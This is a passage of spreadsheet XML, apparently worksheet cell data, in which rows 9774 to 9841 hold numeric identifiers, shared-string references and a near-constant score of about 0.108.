        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9774" ht="15.75" customHeight="1">
      <c r="A9774" s="1">
        <v>4843.0</v>
      </c>
      <c r="B9774" s="2">
        <v>4.3695073E7</v>
      </c>
      <c r="C9774" s="2" t="s">
        <v>9340</v>
      </c>
      <c r="D9774" s="2">
        <v>1.0</v>
      </c>
      <c r="E9774" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9774" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9775" ht="15.75" customHeight="1">
      <c r="A9775" s="1">
        <v>4916.0</v>
      </c>
      <c r="B9775" s="2">
        <v>4.3947865E7</v>
      </c>
      <c r="C9775" s="2" t="s">
        <v>9341</v>
      </c>
      <c r="D9775" s="2">
        <v>1.0</v>
      </c>
      <c r="E9775" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9775" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9776" ht="15.75" customHeight="1">
      <c r="A9776" s="1">
        <v>4925.0</v>
      </c>
      <c r="B9776" s="2">
        <v>4.3984522E7</v>
      </c>
      <c r="C9776" s="2" t="s">
        <v>9342</v>
      </c>
      <c r="D9776" s="2">
        <v>1.0</v>
      </c>
      <c r="E9776" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9776" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9777" ht="15.75" customHeight="1">
      <c r="A9777" s="1">
        <v>5255.0</v>
      </c>
      <c r="B9777" s="2">
        <v>4.5105644E7</v>
      </c>
      <c r="C9777" s="2" t="s">
        <v>9343</v>
      </c>
      <c r="D9777" s="2">
        <v>1.0</v>
      </c>
      <c r="E9777" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9777" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9778" ht="15.75" customHeight="1">
      <c r="A9778" s="1">
        <v>5841.0</v>
      </c>
      <c r="B9778" s="2">
        <v>4.6923482E7</v>
      </c>
      <c r="C9778" s="2" t="s">
        <v>9344</v>
      </c>
      <c r="D9778" s="2">
        <v>1.0</v>
      </c>
      <c r="E9778" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9778" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9779" ht="15.75" customHeight="1">
      <c r="A9779" s="1">
        <v>6423.0</v>
      </c>
      <c r="B9779" s="2">
        <v>4.8557666E7</v>
      </c>
      <c r="C9779" s="2" t="s">
        <v>9345</v>
      </c>
      <c r="D9779" s="2">
        <v>1.0</v>
      </c>
      <c r="E9779" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9779" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9780" ht="15.75" customHeight="1">
      <c r="A9780" s="1">
        <v>6434.0</v>
      </c>
      <c r="B9780" s="2">
        <v>4.8581402E7</v>
      </c>
      <c r="C9780" s="2" t="s">
        <v>9346</v>
      </c>
      <c r="D9780" s="2">
        <v>1.0</v>
      </c>
      <c r="E9780" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9780" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9781" ht="15.75" customHeight="1">
      <c r="A9781" s="1">
        <v>6471.0</v>
      </c>
      <c r="B9781" s="2">
        <v>4.8651902E7</v>
      </c>
      <c r="C9781" s="2" t="s">
        <v>9347</v>
      </c>
      <c r="D9781" s="2">
        <v>1.0</v>
      </c>
      <c r="E9781" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9781" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9782" ht="15.75" customHeight="1">
      <c r="A9782" s="1">
        <v>6601.0</v>
      </c>
      <c r="B9782" s="2">
        <v>4.901336E7</v>
      </c>
      <c r="C9782" s="2" t="s">
        <v>9348</v>
      </c>
      <c r="D9782" s="2">
        <v>1.0</v>
      </c>
      <c r="E9782" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9782" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9783" ht="15.75" customHeight="1">
      <c r="A9783" s="1">
        <v>7545.0</v>
      </c>
      <c r="B9783" s="2">
        <v>5.1492442E7</v>
      </c>
      <c r="C9783" s="2" t="s">
        <v>9349</v>
      </c>
      <c r="D9783" s="2">
        <v>1.0</v>
      </c>
      <c r="E9783" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9783" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9784" ht="15.75" customHeight="1">
      <c r="A9784" s="1">
        <v>7641.0</v>
      </c>
      <c r="B9784" s="2">
        <v>5.1773894E7</v>
      </c>
      <c r="C9784" s="2" t="s">
        <v>9350</v>
      </c>
      <c r="D9784" s="2">
        <v>1.0</v>
      </c>
      <c r="E9784" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9784" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9785" ht="15.75" customHeight="1">
      <c r="A9785" s="1">
        <v>8511.0</v>
      </c>
      <c r="B9785" s="2">
        <v>5.4063443E7</v>
      </c>
      <c r="C9785" s="2" t="s">
        <v>9351</v>
      </c>
      <c r="D9785" s="2">
        <v>1.0</v>
      </c>
      <c r="E9785" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9785" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9786" ht="15.75" customHeight="1">
      <c r="A9786" s="1">
        <v>9482.0</v>
      </c>
      <c r="B9786" s="2">
        <v>5.5888978E7</v>
      </c>
      <c r="C9786" s="2" t="s">
        <v>9352</v>
      </c>
      <c r="D9786" s="2">
        <v>1.0</v>
      </c>
      <c r="E9786" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9786" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9787" ht="15.75" customHeight="1">
      <c r="A9787" s="1">
        <v>10415.0</v>
      </c>
      <c r="B9787" s="2">
        <v>1006868.0</v>
      </c>
      <c r="C9787" s="2" t="s">
        <v>9353</v>
      </c>
      <c r="D9787" s="2">
        <v>1.0</v>
      </c>
      <c r="E9787" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9787" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9788" ht="15.75" customHeight="1">
      <c r="A9788" s="1">
        <v>10416.0</v>
      </c>
      <c r="B9788" s="2">
        <v>1.0069576E7</v>
      </c>
      <c r="C9788" s="2" t="s">
        <v>9354</v>
      </c>
      <c r="D9788" s="2">
        <v>1.0</v>
      </c>
      <c r="E9788" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9788" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9789" ht="15.75" customHeight="1">
      <c r="A9789" s="1">
        <v>10982.0</v>
      </c>
      <c r="B9789" s="2">
        <v>1.7380872E7</v>
      </c>
      <c r="C9789" s="2" t="s">
        <v>9355</v>
      </c>
      <c r="D9789" s="2">
        <v>1.0</v>
      </c>
      <c r="E9789" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9789" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9790" ht="15.75" customHeight="1">
      <c r="A9790" s="1">
        <v>11100.0</v>
      </c>
      <c r="B9790" s="2">
        <v>1.8585654E7</v>
      </c>
      <c r="C9790" s="2" t="s">
        <v>9356</v>
      </c>
      <c r="D9790" s="2">
        <v>1.0</v>
      </c>
      <c r="E9790" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9790" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9791" ht="15.75" customHeight="1">
      <c r="A9791" s="1">
        <v>11204.0</v>
      </c>
      <c r="B9791" s="2">
        <v>2.0050486E7</v>
      </c>
      <c r="C9791" s="2" t="s">
        <v>9357</v>
      </c>
      <c r="D9791" s="2">
        <v>1.0</v>
      </c>
      <c r="E9791" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9791" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9792" ht="15.75" customHeight="1">
      <c r="A9792" s="1">
        <v>11553.0</v>
      </c>
      <c r="B9792" s="2">
        <v>2.2699631E7</v>
      </c>
      <c r="C9792" s="2" t="s">
        <v>9358</v>
      </c>
      <c r="D9792" s="2">
        <v>1.0</v>
      </c>
      <c r="E9792" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9792" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9793" ht="15.75" customHeight="1">
      <c r="A9793" s="1">
        <v>11924.0</v>
      </c>
      <c r="B9793" s="2">
        <v>2.5351697E7</v>
      </c>
      <c r="C9793" s="2" t="s">
        <v>9359</v>
      </c>
      <c r="D9793" s="2">
        <v>1.0</v>
      </c>
      <c r="E9793" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9793" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9794" ht="15.75" customHeight="1">
      <c r="A9794" s="1">
        <v>11952.0</v>
      </c>
      <c r="B9794" s="2">
        <v>2.5572486E7</v>
      </c>
      <c r="C9794" s="2" t="s">
        <v>9360</v>
      </c>
      <c r="D9794" s="2">
        <v>1.0</v>
      </c>
      <c r="E9794" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9794" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9795" ht="15.75" customHeight="1">
      <c r="A9795" s="1">
        <v>13372.0</v>
      </c>
      <c r="B9795" s="2">
        <v>3.4851852E7</v>
      </c>
      <c r="C9795" s="2" t="s">
        <v>9361</v>
      </c>
      <c r="D9795" s="2">
        <v>1.0</v>
      </c>
      <c r="E9795" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9795" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9796" ht="15.75" customHeight="1">
      <c r="A9796" s="1">
        <v>13675.0</v>
      </c>
      <c r="B9796" s="2">
        <v>3.6046896E7</v>
      </c>
      <c r="C9796" s="2" t="s">
        <v>9362</v>
      </c>
      <c r="D9796" s="2">
        <v>1.0</v>
      </c>
      <c r="E9796" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9796" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9797" ht="15.75" customHeight="1">
      <c r="A9797" s="1">
        <v>13916.0</v>
      </c>
      <c r="B9797" s="2">
        <v>3.7099265E7</v>
      </c>
      <c r="C9797" s="2" t="s">
        <v>9363</v>
      </c>
      <c r="D9797" s="2">
        <v>1.0</v>
      </c>
      <c r="E9797" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9797" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9798" ht="15.75" customHeight="1">
      <c r="A9798" s="1">
        <v>14355.0</v>
      </c>
      <c r="B9798" s="2">
        <v>3.8933611E7</v>
      </c>
      <c r="C9798" s="2" t="s">
        <v>9364</v>
      </c>
      <c r="D9798" s="2">
        <v>1.0</v>
      </c>
      <c r="E9798" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9798" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9799" ht="15.75" customHeight="1">
      <c r="A9799" s="1">
        <v>14606.0</v>
      </c>
      <c r="B9799" s="2">
        <v>4.0240314E7</v>
      </c>
      <c r="C9799" s="2" t="s">
        <v>9365</v>
      </c>
      <c r="D9799" s="2">
        <v>1.0</v>
      </c>
      <c r="E9799" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9799" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9800" ht="15.75" customHeight="1">
      <c r="A9800" s="1">
        <v>14783.0</v>
      </c>
      <c r="B9800" s="2">
        <v>4.0912031E7</v>
      </c>
      <c r="C9800" s="2" t="s">
        <v>9366</v>
      </c>
      <c r="D9800" s="2">
        <v>1.0</v>
      </c>
      <c r="E9800" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9800" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9801" ht="15.75" customHeight="1">
      <c r="A9801" s="1">
        <v>14853.0</v>
      </c>
      <c r="B9801" s="2">
        <v>4.1061854E7</v>
      </c>
      <c r="C9801" s="2" t="s">
        <v>9367</v>
      </c>
      <c r="D9801" s="2">
        <v>1.0</v>
      </c>
      <c r="E9801" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9801" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9802" ht="15.75" customHeight="1">
      <c r="A9802" s="1">
        <v>14884.0</v>
      </c>
      <c r="B9802" s="2">
        <v>4.1116688E7</v>
      </c>
      <c r="C9802" s="2" t="s">
        <v>9368</v>
      </c>
      <c r="D9802" s="2">
        <v>1.0</v>
      </c>
      <c r="E9802" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9802" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9803" ht="15.75" customHeight="1">
      <c r="A9803" s="1">
        <v>15676.0</v>
      </c>
      <c r="B9803" s="2">
        <v>4.3824839E7</v>
      </c>
      <c r="C9803" s="2" t="s">
        <v>9369</v>
      </c>
      <c r="D9803" s="2">
        <v>1.0</v>
      </c>
      <c r="E9803" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9803" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9804" ht="15.75" customHeight="1">
      <c r="A9804" s="1">
        <v>16085.0</v>
      </c>
      <c r="B9804" s="2">
        <v>4.5376958E7</v>
      </c>
      <c r="C9804" s="2" t="s">
        <v>9370</v>
      </c>
      <c r="D9804" s="2">
        <v>1.0</v>
      </c>
      <c r="E9804" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9804" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9805" ht="15.75" customHeight="1">
      <c r="A9805" s="1">
        <v>17214.0</v>
      </c>
      <c r="B9805" s="2">
        <v>4.9048637E7</v>
      </c>
      <c r="C9805" s="2" t="s">
        <v>9371</v>
      </c>
      <c r="D9805" s="2">
        <v>1.0</v>
      </c>
      <c r="E9805" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9805" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9806" ht="15.75" customHeight="1">
      <c r="A9806" s="1">
        <v>17245.0</v>
      </c>
      <c r="B9806" s="2">
        <v>4.9083243E7</v>
      </c>
      <c r="C9806" s="2" t="s">
        <v>9372</v>
      </c>
      <c r="D9806" s="2">
        <v>1.0</v>
      </c>
      <c r="E9806" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9806" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9807" ht="15.75" customHeight="1">
      <c r="A9807" s="1">
        <v>17305.0</v>
      </c>
      <c r="B9807" s="2">
        <v>4.928195E7</v>
      </c>
      <c r="C9807" s="2" t="s">
        <v>9373</v>
      </c>
      <c r="D9807" s="2">
        <v>1.0</v>
      </c>
      <c r="E9807" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9807" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9808" ht="15.75" customHeight="1">
      <c r="A9808" s="1">
        <v>17801.0</v>
      </c>
      <c r="B9808" s="2">
        <v>5.0809736E7</v>
      </c>
      <c r="C9808" s="2" t="s">
        <v>9374</v>
      </c>
      <c r="D9808" s="2">
        <v>1.0</v>
      </c>
      <c r="E9808" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9808" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9809" ht="15.75" customHeight="1">
      <c r="A9809" s="1">
        <v>18386.0</v>
      </c>
      <c r="B9809" s="2">
        <v>5.2596209E7</v>
      </c>
      <c r="C9809" s="2" t="s">
        <v>9375</v>
      </c>
      <c r="D9809" s="2">
        <v>1.0</v>
      </c>
      <c r="E9809" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9809" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9810" ht="15.75" customHeight="1">
      <c r="A9810" s="1">
        <v>18581.0</v>
      </c>
      <c r="B9810" s="2">
        <v>5.324711E7</v>
      </c>
      <c r="C9810" s="2" t="s">
        <v>9376</v>
      </c>
      <c r="D9810" s="2">
        <v>1.0</v>
      </c>
      <c r="E9810" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9810" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9811" ht="15.75" customHeight="1">
      <c r="A9811" s="1">
        <v>18820.0</v>
      </c>
      <c r="B9811" s="2">
        <v>5.3926793E7</v>
      </c>
      <c r="C9811" s="2" t="s">
        <v>9377</v>
      </c>
      <c r="D9811" s="2">
        <v>1.0</v>
      </c>
      <c r="E9811" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9811" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9812" ht="15.75" customHeight="1">
      <c r="A9812" s="1">
        <v>18960.0</v>
      </c>
      <c r="B9812" s="2">
        <v>5.435524E7</v>
      </c>
      <c r="C9812" s="2" t="s">
        <v>9378</v>
      </c>
      <c r="D9812" s="2">
        <v>1.0</v>
      </c>
      <c r="E9812" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9812" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9813" ht="15.75" customHeight="1">
      <c r="A9813" s="1">
        <v>19016.0</v>
      </c>
      <c r="B9813" s="2">
        <v>5.4524443E7</v>
      </c>
      <c r="C9813" s="2" t="s">
        <v>9379</v>
      </c>
      <c r="D9813" s="2">
        <v>1.0</v>
      </c>
      <c r="E9813" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9813" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9814" ht="15.75" customHeight="1">
      <c r="A9814" s="1">
        <v>20136.0</v>
      </c>
      <c r="B9814" s="2">
        <v>1.0104057E7</v>
      </c>
      <c r="C9814" s="2" t="s">
        <v>9380</v>
      </c>
      <c r="D9814" s="2">
        <v>1.0</v>
      </c>
      <c r="E9814" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9814" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9815" ht="15.75" customHeight="1">
      <c r="A9815" s="1">
        <v>20501.0</v>
      </c>
      <c r="B9815" s="2">
        <v>1.2895497E7</v>
      </c>
      <c r="C9815" s="2" t="s">
        <v>9381</v>
      </c>
      <c r="D9815" s="2">
        <v>1.0</v>
      </c>
      <c r="E9815" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9815" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9816" ht="15.75" customHeight="1">
      <c r="A9816" s="1">
        <v>20614.0</v>
      </c>
      <c r="B9816" s="2">
        <v>1.3987339E7</v>
      </c>
      <c r="C9816" s="2" t="s">
        <v>9382</v>
      </c>
      <c r="D9816" s="2">
        <v>1.0</v>
      </c>
      <c r="E9816" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9816" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9817" ht="15.75" customHeight="1">
      <c r="A9817" s="1">
        <v>21035.0</v>
      </c>
      <c r="B9817" s="2">
        <v>1.7582611E7</v>
      </c>
      <c r="C9817" s="2" t="s">
        <v>9383</v>
      </c>
      <c r="D9817" s="2">
        <v>1.0</v>
      </c>
      <c r="E9817" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9817" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9818" ht="15.75" customHeight="1">
      <c r="A9818" s="1">
        <v>21037.0</v>
      </c>
      <c r="B9818" s="2">
        <v>1.7623992E7</v>
      </c>
      <c r="C9818" s="2" t="s">
        <v>9384</v>
      </c>
      <c r="D9818" s="2">
        <v>1.0</v>
      </c>
      <c r="E9818" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9818" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9819" ht="15.75" customHeight="1">
      <c r="A9819" s="1">
        <v>21941.0</v>
      </c>
      <c r="B9819" s="2">
        <v>2.8704693E7</v>
      </c>
      <c r="C9819" s="2" t="s">
        <v>9385</v>
      </c>
      <c r="D9819" s="2">
        <v>1.0</v>
      </c>
      <c r="E9819" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9819" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9820" ht="15.75" customHeight="1">
      <c r="A9820" s="1">
        <v>22334.0</v>
      </c>
      <c r="B9820" s="2">
        <v>3.4375464E7</v>
      </c>
      <c r="C9820" s="2" t="s">
        <v>9386</v>
      </c>
      <c r="D9820" s="2">
        <v>1.0</v>
      </c>
      <c r="E9820" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9820" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9821" ht="15.75" customHeight="1">
      <c r="A9821" s="1">
        <v>22345.0</v>
      </c>
      <c r="B9821" s="2">
        <v>3.455034E7</v>
      </c>
      <c r="C9821" s="2" t="s">
        <v>9387</v>
      </c>
      <c r="D9821" s="2">
        <v>1.0</v>
      </c>
      <c r="E9821" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9821" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9822" ht="15.75" customHeight="1">
      <c r="A9822" s="1">
        <v>23135.0</v>
      </c>
      <c r="B9822" s="2">
        <v>5.1501321E7</v>
      </c>
      <c r="C9822" s="2" t="s">
        <v>9388</v>
      </c>
      <c r="D9822" s="2">
        <v>1.0</v>
      </c>
      <c r="E9822" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9822" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9823" ht="15.75" customHeight="1">
      <c r="A9823" s="1">
        <v>23782.0</v>
      </c>
      <c r="B9823" s="2">
        <v>7652285.0</v>
      </c>
      <c r="C9823" s="2" t="s">
        <v>9389</v>
      </c>
      <c r="D9823" s="2">
        <v>1.0</v>
      </c>
      <c r="E9823" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9823" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9824" ht="15.75" customHeight="1">
      <c r="A9824" s="1">
        <v>23894.0</v>
      </c>
      <c r="B9824" s="2">
        <v>8434283.0</v>
      </c>
      <c r="C9824" s="2" t="s">
        <v>9390</v>
      </c>
      <c r="D9824" s="2">
        <v>1.0</v>
      </c>
      <c r="E9824" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9824" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9825" ht="15.75" customHeight="1">
      <c r="A9825" s="1">
        <v>24208.0</v>
      </c>
      <c r="B9825" s="2">
        <v>1.0382417E7</v>
      </c>
      <c r="C9825" s="2" t="s">
        <v>9391</v>
      </c>
      <c r="D9825" s="2">
        <v>1.0</v>
      </c>
      <c r="E9825" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9825" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9826" ht="15.75" customHeight="1">
      <c r="A9826" s="1">
        <v>26345.0</v>
      </c>
      <c r="B9826" s="2">
        <v>1.6787776E7</v>
      </c>
      <c r="C9826" s="2" t="s">
        <v>9392</v>
      </c>
      <c r="D9826" s="2">
        <v>1.0</v>
      </c>
      <c r="E9826" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9826" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9827" ht="15.75" customHeight="1">
      <c r="A9827" s="1">
        <v>26505.0</v>
      </c>
      <c r="B9827" s="2">
        <v>1.758261E7</v>
      </c>
      <c r="C9827" s="2" t="s">
        <v>9393</v>
      </c>
      <c r="D9827" s="2">
        <v>1.0</v>
      </c>
      <c r="E9827" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9827" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9828" ht="15.75" customHeight="1">
      <c r="A9828" s="1">
        <v>26512.0</v>
      </c>
      <c r="B9828" s="2">
        <v>1.7607971E7</v>
      </c>
      <c r="C9828" s="2" t="s">
        <v>9394</v>
      </c>
      <c r="D9828" s="2">
        <v>1.0</v>
      </c>
      <c r="E9828" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9828" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9829" ht="15.75" customHeight="1">
      <c r="A9829" s="1">
        <v>27234.0</v>
      </c>
      <c r="B9829" s="2">
        <v>2.1047142E7</v>
      </c>
      <c r="C9829" s="2" t="s">
        <v>9395</v>
      </c>
      <c r="D9829" s="2">
        <v>1.0</v>
      </c>
      <c r="E9829" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9829" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9830" ht="15.75" customHeight="1">
      <c r="A9830" s="1">
        <v>30510.0</v>
      </c>
      <c r="B9830" s="2">
        <v>4.0083871E7</v>
      </c>
      <c r="C9830" s="2" t="s">
        <v>9396</v>
      </c>
      <c r="D9830" s="2">
        <v>1.0</v>
      </c>
      <c r="E9830" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9830" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9831" ht="15.75" customHeight="1">
      <c r="A9831" s="1">
        <v>31239.0</v>
      </c>
      <c r="B9831" s="2">
        <v>4.9285368E7</v>
      </c>
      <c r="C9831" s="2" t="s">
        <v>9397</v>
      </c>
      <c r="D9831" s="2">
        <v>1.0</v>
      </c>
      <c r="E9831" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9831" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9832" ht="15.75" customHeight="1">
      <c r="A9832" s="1">
        <v>31949.0</v>
      </c>
      <c r="B9832" s="2">
        <v>5310016.0</v>
      </c>
      <c r="C9832" s="2" t="s">
        <v>9398</v>
      </c>
      <c r="D9832" s="2">
        <v>1.0</v>
      </c>
      <c r="E9832" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9832" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9833" ht="15.75" customHeight="1">
      <c r="A9833" s="1">
        <v>33528.0</v>
      </c>
      <c r="B9833" s="2">
        <v>8115741.0</v>
      </c>
      <c r="C9833" s="2" t="s">
        <v>9399</v>
      </c>
      <c r="D9833" s="2">
        <v>1.0</v>
      </c>
      <c r="E9833" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9833" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9834" ht="15.75" customHeight="1">
      <c r="A9834" s="1">
        <v>33676.0</v>
      </c>
      <c r="B9834" s="2">
        <v>8425292.0</v>
      </c>
      <c r="C9834" s="2" t="s">
        <v>9400</v>
      </c>
      <c r="D9834" s="2">
        <v>1.0</v>
      </c>
      <c r="E9834" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9834" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9835" ht="15.75" customHeight="1">
      <c r="A9835" s="1">
        <v>33784.0</v>
      </c>
      <c r="B9835" s="2">
        <v>8736116.0</v>
      </c>
      <c r="C9835" s="2" t="s">
        <v>9401</v>
      </c>
      <c r="D9835" s="2">
        <v>1.0</v>
      </c>
      <c r="E9835" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9835" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9836" ht="15.75" customHeight="1">
      <c r="A9836" s="1">
        <v>33901.0</v>
      </c>
      <c r="B9836" s="2">
        <v>9213556.0</v>
      </c>
      <c r="C9836" s="2" t="s">
        <v>9402</v>
      </c>
      <c r="D9836" s="2">
        <v>1.0</v>
      </c>
      <c r="E9836" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9836" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9837" ht="15.75" customHeight="1">
      <c r="A9837" s="1">
        <v>34255.0</v>
      </c>
      <c r="B9837" s="2">
        <v>4.9279712E7</v>
      </c>
      <c r="C9837" s="2" t="s">
        <v>9403</v>
      </c>
      <c r="D9837" s="2">
        <v>1.0</v>
      </c>
      <c r="E9837" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9837" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9838" ht="15.75" customHeight="1">
      <c r="A9838" s="1">
        <v>2402.0</v>
      </c>
      <c r="B9838" s="2">
        <v>3.3428868E7</v>
      </c>
      <c r="C9838" s="2" t="s">
        <v>9404</v>
      </c>
      <c r="D9838" s="2">
        <v>1.0</v>
      </c>
      <c r="E9838" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9838" s="2">
        <v>0.1081871345029239</v>
      </c>
    </row>
    <row r="9839" ht="15.75" customHeight="1">
      <c r="A9839" s="1">
        <v>20387.0</v>
      </c>
      <c r="B9839" s="2">
        <v>1.2026145E7</v>
      </c>
      <c r="C9839" s="2" t="s">
        <v>9405</v>
      </c>
      <c r="D9839" s="2">
        <v>1.0</v>
      </c>
      <c r="E9839" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9839" s="2">
        <v>0.1081871345029239</v>
      </c>
    </row>
    <row r="9840" ht="15.75" customHeight="1">
      <c r="A9840" s="1">
        <v>6329.0</v>
      </c>
      <c r="B9840" s="2">
        <v>4.8287353E7</v>
      </c>
      <c r="C9840" s="2" t="s">
        <v>9406</v>
      </c>
      <c r="D9840" s="2">
        <v>1.0</v>
      </c>
      <c r="E9840" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9840" s="2">
        <v>0.1081349206349207</v>
      </c>
    </row>
    <row r="9841" ht="15.75" customHeight="1">
      <c r="A9841" s="1">
        <v>1376.0</v>
